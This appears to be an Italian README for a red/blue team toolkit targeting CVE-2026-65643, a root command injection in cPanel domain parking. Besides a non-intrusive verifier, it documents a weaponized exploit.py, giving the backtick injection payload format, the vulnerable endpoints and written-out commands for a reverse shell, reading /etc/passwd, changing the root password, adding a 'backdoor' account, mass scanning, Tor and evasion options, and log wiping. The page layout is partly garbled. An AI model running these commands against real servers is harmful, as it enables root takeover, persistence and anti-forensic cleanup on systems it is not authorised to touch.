
Toolkit Red/Blue team per CVE-2026-65643, una RCE sul domain parking di cPanel. Include exploit con reverse shell, webshell, persistenza e scansione di massa, oltre a un verificatore non intrusivo per rilevamento e audit.

⚠️ SOLO USO ETICO – TEST DI SICUREZZA AUTORIZZATI
Questo repository fornisce strumenti esclusivamente per professionisti della sicurezza autorizzati, blue team e penetration tester.
L'accesso non autorizzato a sistemi informatici è illegale ai sensi del CFAA (USA), Computer Misuse Act (UK), TCK 243/244 (Turchia) e leggi simili in tutto il mondo.
CVE‑2026‑65643 è una vulnerabilità critica di injection di comandi in cPanel & WHM versioni 11.x che consente a un utente cPanel autenticato di eseguire comandi di sistema arbitrari con privilegi di root tramite la funzionalità di domain parking.
`).| Strumento | Scopo | Utente Previsto |
|---|---|---|
exploit.py | Toolkit completo armato con reverse shell, webshell, persistenza, lettura/scrittura file, cambio password root, scansione di massa, supporto Tor e funzionalità OPSEC. |
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt
requests
urllib3
exploit.pyverifier.pyLo strumento utilizza i seguenti endpoint e metodi di injection di cPanel:
# Formato payload di injection
test.com`<comando>`
# Esempio
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`
Questo software è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.
| Red team / pentester autorizzati |
verifier.py | Verificatore di vulnerabilità non intrusivo che rileva la versione di cPanel, valida l'injection e valuta il rischio senza eseguire alcun payload dannoso. Genera report dettagliati. | Blue team / auditor di sicurezza |
| Funzionalità | exploit.py | verifier.py |
|---|
| Rilevamento vulnerabilità | ✅ | ✅ |
| Rilevamento versione (4 endpoint) | ✅ | ✅ |
| Injection di comandi | ✅ | ❌ |
| Reverse shell | ✅ | ❌ |
| Upload WebShell | ✅ | ❌ |
| Persistenza (creazione utente cPanel) | ✅ | ❌ |
| Cambio password root | ✅ | ❌ |
| Lettura/scrittura file | ✅ | ❌ |
| 4 metodi di injection (JSON/Form/CGI/API2) | ✅ | ✅ |
| Supporto Tor (anonimato) | ✅ | ❌ |
| Rotazione User‑Agent (OPSEC) | ✅ | ❌ |
| Jitter (OPSEC) | ✅ | ❌ |
| Scansione di massa (multi‑thread) | ✅ | ❌ |
| Shell interattiva | ✅ | ❌ |
| Modalità non intrusiva (sicura) | ❌ | ✅ |
| Registrazione timeline | ✅ | ✅ |
| Report HTML | ✅ | ❌ |
| Report JSON | ✅ | ✅ |
| Pulizia log (anti‑forense) | ✅ | ✅ |
| Supporto proxy | ✅ | ✅ |
| User‑Agent personalizzato | ✅ | ✅ |
| Controllo verifica SSL | ✅ | ✅ |
| Scenario | Strumento Consigliato |
|---|
| Blue Team – verifica se la propria installazione cPanel è vulnerabile | verifier.py |
| Audit di Sicurezza – valutazione della vulnerabilità non intrusiva | verifier.py |
| Red Team – penetration testing autorizzato con sfruttamento completo | exploit.py |
| Bug Bounty – test di divulgazione responsabile | verifier.py |
| Scansione di Massa – verifica di più target per la vulnerabilità | exploit.py (solo rilevamento) |
| Risposta agli Incidenti – verifica se i sistemi sono compromessi | verifier.py |
| Parametro | Descrizione |
|---|
-t, --target | URL cPanel di destinazione (es. https://cpanel.example.com:2083) |
-l, --target-file | File contenente l'elenco dei target (uno per riga) per la scansione di massa |
-u, --username | Nome utente cPanel |
-P, --password | Password cPanel |
-p, --port | Sovrascrive la porta cPanel (predefinita dall'URL o 2083) |
--threads | Numero di thread per multi‑target (predefinito: 10) |
-o, --output | Salva il report JSON in un file |
--html-report | Salva il report HTML in un file |
-v, --verbose | Output dettagliato |
--proxy | Proxy HTTP/HTTPS (es. http://127.0.0.1:8080) |
--tor | Instrada attraverso Tor (localhost:9050) |
-ua, --user-agent | User‑Agent personalizzato |
--no-keep-alive | Non mantenere la sessione attiva |
--delay | Ritardo tra le richieste (predefinito: 2.0s) |
--jitter | Jitter casuale (0‑1 sec) tra le richieste (predefinito: 0.5) |
--max-retries | Numero massimo di tentativi (predefinito: 5) |
--ssl-verify | Verifica i certificati SSL |
--timeout | Timeout della richiesta (predefinito: 15s) |
--cmd | Esegue un singolo comando sul target |
--reverse-shell | Reverse shell IP:PORT |
--passwd | Cambia la password di root |
--adduser | Crea un utente cPanel (UTENTE DOMINIO PASSWORD) |
--read | Legge un file |
--write | Scrive un file (specificare il percorso) |
--write-content | Contenuto da scrivere |
--cleanup | Pulisce log e cronologia dopo lo sfruttamento |
-i, --interactive | Shell interattiva dopo lo sfruttamento |
--domain-suffix | Suffisso per il dominio parcheggiato (predefinito: exploit.local) |
| Parametro | Descrizione |
|---|
-t, --target | URL cPanel di destinazione (es. https://cpanel.example.com:2083) |
-u, --username | Nome utente cPanel |
-P, --password | Password cPanel |
-o, --output | Salva il report JSON in un file |
-v, --verbose | Output dettagliato |
--proxy | Proxy HTTP/HTTPS (es. http://127.0.0.1:8080) |
--tor | Instrada attraverso Tor (localhost:9050) |
--ssl-verify | Verifica i certificati SSL |
--timeout | Timeout della richiesta (predefinito: 15s) |
--cleanup | Pulisce i log dopo il test |
| # | Scenario | Comando |
|---|
| 1 | Verifica rapida della vulnerabilità | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass |
| 2 | Scansione dettagliata con report | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v |
| 3 | Reverse shell | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | Esecuzione comando | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami" |
| 5 | Lettura file sensibile | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | Cambio password root | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | Creazione nuovo utente cPanel (persistenza) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | Shell interattiva dopo lo sfruttamento | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | Scansione di massa da file | python exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json |
| 10 | Uso di proxy, Tor e User‑Agent personalizzato | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0" |
| 11 | Pulizia log dopo lo sfruttamento | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup |
| Metodo | Endpoint | Descrizione |
|---|
| API JSON | /cpsessXXXXX/json-api/domain | Metodo di injection primario tramite payload JSON |
| Dati Form | /cpsessXXXXX/json-api/domain | Injection alternativa tramite dati codificati in form |
| Script CGI | /cgi-sys/domainpark.cgi | Injection su endpoint CGI legacy |
| API2 | /cpsessXXXXX/json-api/cpanel | Metodo di injection API2 legacy |